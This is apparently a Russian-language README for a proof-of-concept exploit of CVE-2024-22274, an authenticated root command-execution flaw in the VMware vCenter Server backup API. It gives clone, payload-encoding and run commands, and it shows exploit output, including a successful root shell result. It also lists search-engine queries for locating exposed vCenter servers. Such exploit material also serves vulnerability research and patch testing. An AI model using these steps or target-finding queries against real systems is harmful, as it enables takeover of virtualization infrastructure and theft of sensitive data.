
PoC - Аутентифицированное удаленное выполнение кода в VMware vCenter Server (Эксплойт)
API-компоненты «com.vmware.appliance.recovery.backup.job.create» и «com.vmware.appliance.recovery.backup.validate» уязвимы к атаке внедрения флага, которую можно использовать для выполнения произвольных команд от имени пользователя root в целевой системе.
[!NOTE] Для работы с этим PoC эксплойтом необходимо иметь действительные учетные данные и войти в оболочку VMware vCenter Server через SSH. Пользователь должен иметь роль "admin", как указано в файле
vcenter_creds.txt.
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
Запустите или измените
user2base64.shдля кодирования нового пользователя в base64, и он автоматически создастpayload.txt
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
Этот пример означает, что вы подключились, но полезная нагрузка не была настроена или загружена правильно. Обратитесь к PDF PoC для получения более подробной информации.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
Пожалуйста, проверьте адрес хоста и учетные данные.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter", Фильтр: services.port: 443 AND tags: "VMware"title="VMware vCenter", Фильтр: port="443" && title="VMware vCenter""VMware vCenter", Фильтр: port:443 "VMware vCenter"Этот PoC эксплойт не будет эффективным, если вы не понимаете, как интерпретировать скрипт, так как он был намеренно изменен, чтобы предотвратить использование его «скрипт-кидди» без понимания. VMware vCenter Server является критическим компонентом в управлении виртуализированными средами; если кто-то получит к нему доступ, он сможет получить полный контроль над виртуальной инфраструктурой и извлечь конфиденциальные данные. Этот PoC предназначен для тех, кто уже обладает небольшими техническими знаниями для его правильного использования, поэтому, если вы скрипт-кидди, стремящиеся вызвать нарушения без понимания последствий, этот эксплойт вам не пригодится.
Этот инструмент предоставляется только для образовательных и исследовательских целей. Создатель не несет ответственности за любое неправомерное использование или ущерб, причиненный инструментом. create issue